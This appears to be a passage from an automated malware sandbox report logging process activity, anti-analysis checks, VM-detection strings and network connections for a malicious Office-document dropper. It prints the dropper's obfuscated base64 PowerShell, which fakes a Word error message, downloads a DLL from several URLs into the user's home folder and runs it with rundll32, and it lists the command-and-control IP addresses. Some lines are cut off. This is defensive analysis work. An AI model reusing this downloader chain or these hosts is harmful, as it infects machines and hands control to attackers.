                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3647
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5292
                Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976Thread sleep count: 3647 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep count: 5292 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6700Thread sleep time: -7378697629483816s >= -30000s
                Source: C:\Windows\System32\svchost.exe TID: 6200Thread sleep time: -210000s >= -30000s
                Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4A461 FindFirstFileW,
                Source: svchost.exe, 0000000F.00000002.762491532.0000027963AFC000.00000004.00000001.sdmpBinary or memory string: $@Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: powershell.exe, 00000004.00000002.701036480.000002712B822000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWB7%SystemRoot%\system32\mswsock.dllBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwBy
                Source: svchost.exe, 0000000F.00000002.762477860.0000027963AED000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: svchost.exe, 0000000F.00000002.762378344.0000027963A82000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
                Source: powershell.exe, 00000004.00000002.701205155.000002712BCA0000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.710854626.0000021703940000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.728166492.00000202A9140000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.763462020.0000027964A00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10002460 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00F4166C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10004500 GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10007528 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10009F26 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10006F64 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                System process connects to network (likely due to code injection or exploit)Show sources
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 97.120.3.198 80
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 70.180.33.202 80
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 50.116.111.59 144
                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 173.249.20.233 187
                Encrypted powershell cmdline option foundShow sources
                Source: unknownProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $CrA = [TyPE]("{3}{1}{0}{2}" -F 'em.IO.','St','direCtOry','sY') ; SV ("5hv"+"1z") ([TyPE]("{1}{2}{4}{3}{0}"-f'nAGeR','sYstE','M.Net.SeRVic','A','epOiNTm') ) ; $Avnn0uf=(('Ty7n'+'0')+'sc');$H2q6qpz=$Umcrug1 + [char](64) + $Yvk6hcp;$N667cll=('P'+('4m'+'s')+('v'+'rs')); ( GeT-VaRIaBLE ("C"+"ra") ).VaLUE::"cR`e`AtedIr`Ectory"($HOME + (('{0}F'+('2n'+'efq')+'6{0}P'+('rs'+'2nd')+'h{0}')-F [CHaR]92));$K00aa2c=('Wh'+('p'+'oj')+'lo'); ( geT-VAriABle ("5HV"+"1z") ).VaLUE::"sEcURItypR`OToC`OL" = ('T'+('l'+'s12'));$Fz5dygs=('B'+('p'+'825i'+'v'));$Q4a8l15 = (('Ch'+'pie'+'o')+'g');$Uab688o=('K'+'y'+('j8x'+'oq'));$Lr0w5la=('P'+('9'+'lc7f')+'u');$Zrwjh9k=$HOME+(('{0'+'}F2n'+'ef'+'q6{0}Prs2'+'ndh{0}')-f[CHaR]92)+$Q4a8l15+('.d'+'ll');$Nbmxfxv=(('Aw'+'n')+('g'+'0z6'));$V0_ri0n=New`-oB`jEcT neT.webCLIeNt;$Nkq_g0q=(('h'+(('ttp:'+'J)(3s'))+(('2'+')('))+(('J'+')(3s2'+')(arq'))+'ui'+('v'+'opop.c')+('o'+'m'+'.brJ')+((')'+'(3s'))+(('2)'))+(('(i'))+'n'+('dex_htm_'+'f'+'il'+'esJ')+((')'+'(3'))+(('s'+'2)'))+(('(Kx'+'hJ'))+((')('+'3'))+(('s2)(@ht'+'t'+'p'))+(('s:J'+')(3s2'))+((')(J'+')'))+'('+'3s'+(('2)'))+(('(cairoc'+'a'+'d'))+'.c'+(('om'+'J)('+'3'))+(('s'+'2)(c'))+('gi'+'-'+'binJ')+((')(3s2)('+'1P'+'B'+'B'))+(('J)(3s2)'+'('))+'@'+('h'+'tt')+'p'+'s'+((':J)(3s2'+')(J'+')(3'))+'s'+(('2)('+'w'))+('ww.'+'i'+'satechno')+'l'+('o'+'gy.')+(('comJ'+')(3s'+'2)'+'(t'+'raining'+'J)('+'3'))+'s2'+((')'+'(bJ'+')('))+(('3s2'+')'))+(('(@ht'+'t'))+'p'+':'+(('J)'))+'('+'3'+(('s2'+')('))+(('J)'))+(('(3s'+'2')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll,#1
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKA